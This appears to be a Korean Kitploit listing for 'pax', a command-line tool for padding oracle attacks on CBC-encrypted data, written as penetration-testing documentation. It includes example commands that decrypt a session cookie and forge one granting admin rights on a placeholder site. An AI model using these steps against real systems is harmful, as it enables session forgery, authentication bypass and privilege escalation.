Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/liamg/pax
ExploitationWeb Application ExploitationCryptographyPenetration Testing
GitHubliamg/pax

pax

💀 🔓 PKCS7 패딩 오라클 공격을 위한 CLI 도구

저장소 보기
142175년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

pax

Travis Build Status GoReportCard

재미와 이익을 위해 패딩 오라클을 익스플로잇하세요!

Pax (PAdding oracle eXploiter)는 패딩 오라클을 익스플로잇하기 위한 도구로, 다음을 수행합니다:

  1. 주어진 CBC 암호화 데이터에 대한 평문을 얻습니다.
  2. 오라클이 사용하는 알 수 없는 암호화 알고리즘을 사용하여 주어진 평문에 대한 암호화된 바이트를 얻습니다.

이것은 암호화된 세션 정보를 노출하는 데 사용될 수 있으며, 종종 인증을 우회하고, 권한을 상승시키며, 사용자 정의 평문을 암호화하여 서버에 다시 써서 원격으로 코드를 실행하는 데 사용됩니다.

항상 그렇듯이, 이 도구는 귀하가 소유하고 있거나 프로브할 권한이 있는 시스템에서만 사용해야 합니다!

설치

릴리스에서 다운로드하거나 Go로 설치하십시오:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

사용 예제

암호화된 데이터가 SESS라는 쿠키에 저장된 의심되는 오라클을 발견하면 다음을 사용할 수 있습니다:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

이것은 바라건대 당신에게 평문을 제공할 것입니다, 아마도 다음과 같은 것:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

여기서 권한을 상승시킬 수 있을 것 같습니다!

먼저 오라클이 교활한 평문으로 복호화할 자신만의 암호화 데이터를 생성하여 시도할 수 있습니다:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

이것은 또 다른 base64 인코딩된 암호화 데이터를 출력할 것입니다, 아마도 다음과 같은 것:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

이제 브라우저를 열고 SESS 쿠키의 값을 위의 값으로 설정할 수 있습니다. 원래 오라클 페이지를 로드하면 이제 관리자 수준으로 상승된 것을 볼 수 있습니다.

이것은 어떻게 작동하나요?

다음은 이 공격이 어떻게 작동하는지에 대한 훌륭한 가이드입니다:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
도구 다운로드